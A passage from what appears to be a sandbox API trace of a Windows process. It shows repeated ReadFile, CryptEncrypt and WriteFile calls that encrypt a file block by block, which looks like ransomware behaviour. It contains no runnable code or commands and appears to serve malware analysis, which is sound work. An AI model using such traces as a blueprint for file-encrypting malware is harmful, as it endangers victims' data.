hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.599] GetLastError () returned 0x0 [0165.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.599] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.599] GetLastError () returned 0x0 [0165.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.599] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.599] GetLastError () returned 0x0 [0165.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.599] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.599] GetLastError () returned 0x0 [0165.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.599] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.599] GetLastError () returned 0x0 [0165.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.600] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.600] GetLastError () returned 0x0 [0165.600] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.600] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.600] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.600] GetLastError () returned 0x0 [0165.600] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.600] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.600] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.600] GetLastError () returned 0x0 [0165.600] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.600] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.600] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.600] GetLastError () returned 0x0 [0165.600] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.600] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.600] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.600] GetLastError () returned 0x0 [0165.600] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.600] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.600] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.600] GetLastError () returned 0x0 [0165.671] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.671] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.671] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.672] GetLastError () returned 0x0 [0165.672] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.672] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.672] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.672] GetLastError () returned 0x0 [0165.672] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.672] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.672] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.672] GetLastError () returned 0x0 [0165.672] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.672] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.672] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.672] GetLastError () returned 0x0 [0165.672] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.672] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.672] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.672] GetLastError () returned 0x0 [0165.672] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.672] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.672] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.672] GetLastError () returned 0x0 [0165.672] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.672] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.673] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.673] GetLastError () returned 0x0 [0165.673] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.673] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.673] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.673] GetLastError () returned 0x0 [0165.673] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.673] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.673] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.673] GetLastError () returned 0x0 [0165.673] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.673] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.673] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.673] GetLastError () returned 0x0 [0165.673] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.673] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.673] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.673] GetLastError () returned 0x0 [0165.673] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.673] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.673] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.673] GetLastError () returned 0x0 [0165.673] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.673] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.673] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.673] GetLastError () returned 0x0 [0165.674] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.674] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.674] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.674] GetLastError () returned 0x0 [0165.674] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.674] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.674] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.674] GetLastError () returned 0x0 [0165.674] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.674] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.674] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.674] GetLastError () returned 0x0 [0165.674] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.674] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.674] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.674] GetLastError () returned 0x0 [0165.674] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.674] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.674] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.674] GetLastError () returned 0x0 [0165.674] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.674] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.674] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.674] GetLastError () returned 0x0 [0165.674] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.674] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.675] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.675] GetLastError () returned 0x0 [0165.675] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.675] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.675] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.675] GetLastError () returned 0x0 [0165.675] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.675] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, 